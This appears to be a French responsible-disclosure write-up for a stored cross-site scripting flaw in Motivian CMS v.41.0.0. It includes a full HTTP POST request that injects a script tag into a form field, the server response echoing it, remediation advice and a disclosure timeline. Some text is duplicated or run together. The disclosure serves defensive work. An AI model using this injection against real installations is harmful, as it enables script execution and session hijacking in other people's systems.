
Ce dépôt révèle une vulnérabilité de sécurité découverte dans Motivian Content Management System v.41.0.0.
Ce dépôt révèle une vulnérabilité de sécurité découverte dans le système de gestion de contenu Motivian v.41.0.0.
Cette vulnérabilité a été signalée à l'éditeur conformément aux bonnes pratiques de divulgation responsable, ainsi qu'à MITRE, qui a attribué un identifiant CVE temporaire. Les détails sont rendus publics après l'expiration du délai de divulgation de 45 jours.
Marketing/Forms, Marketing/Offers, Content/PagesUne vulnérabilité de script intersite (Cross-Site Scripting) dans le système de gestion de contenu Motivian v.41.0.0 permet à un attaquant distant d'exécuter du code arbitraire via les composants Marketing/Forms, Marketing/Offers et Content/Pages. La vulnérabilité a été exploitée en injectant du code JavaScript malveillant dans divers champs, notamment le titre dans Marketing/Form et Marketing/Offers, ainsi que le champ header script dans Content/Pages.
La vulnérabilité peut être exploitée via divers champs de différents composants. À des fins de démonstration, la preuve de concept suivante se concentre sur un scénario spécifique :
Marketing/Forms et créez un nouvel élément de formulaire.Vous trouverez ci-dessous la transcription complète des requêtes et réponses HTTP utilisées pour démontrer le problème :
POST /portal/admin/formbuilder/editCmsFormProps!saveForm.action HTTP/1.1
Host: [REDACTED]
Content-Length: 1362
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
targetFieldId=&targetFormId=&targetFieldIndex=&openedTabProps=tab1&langSelected=it&form.id=1162&search_form_id=&search_form_status_id=&search_form_name=&search_form_description=&date_from=&date_to=¤tPage=&struts.token.name=EditCmsFormProps&EditCmsFormProps=DBFW4RH1O9SVF1J3J9TA0WSD5VHPJCKY&date_notification=&form.seoName_en=&form.seoName_el=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&[...]
HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Feb 2025 12:00:09 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 94593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>MOTIVIAN | Content Management</title> <link rel="shortcut icon" type="image/x-icon" href="/portal/favicon.ico"/> <link rel="icon" type="image/x-icon" href="/portal/favicon.ico"/> <script> <a href="javascript:void(0)" class="sortingRow" onclick="javascript:simplePagesFormDoSort('status','asc')" >Status</a></td> <td class="TableHeader" colspan="9" style="width:188px">Management</td> <td class="TableHeader w10"> </td> </tr> </table> </td> </tr> <tr> <td class="w10 row_odd"> </td> <td class="w70 row_odd"> <div class="check-box w70" style="float:left"> <input type="checkbox" id="subpages_formIds_id_1162" name="formIds" value="1162"> <label for="subpages_formIds_id_1162">1162 </label> </div> </td> <td class="w40 row_odd"><img src="https://raw.githubusercontent.com/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss/HEAD/portal/assets/images/red_form.png"/></td> <td class="NameCol row_odd"> <div class="wrap_words_within_rows w155"><script>alert(document.domain)</script> [...]
Assainissez toutes les entrées utilisateur et échappez les sorties avant le rendu. Implémentez l'en-tête CSP (Content Security Policy) pour atténuer les risques XSS.
| Date | Action |
|---|---|
| 2025-02-06 | Demande d'identifiant CVE (CNA : MITRE) |
Découverte et divulgation responsable par :
Francesco Marcuccio
Consultant en cybersécurité, testeur d'intrusion
Attribution du découvreur selon MITRE :
Francesco Marcuccio
Consultant en cybersécurité, testeur d'intrusion
Liens de référence : MITRE NIST
Cet identifiant CVE est officiellement au statut PUBLISHED. Il sera mis à jour avec le score CVSS par NIST, après analyse.
| 2025-04-02 | Attribution de l'identifiant CVE |
| 2025-04-07 | Vulnérabilités signalées à l'éditeur |
| 2025-05-31 | Divulgation publique après expiration du délai de divulgation de 45 jours (54 jours au total) |
| 2025-06-04 | Enregistrement officiel et inscription dans la base de données MITRE et le portail NIST/NVD |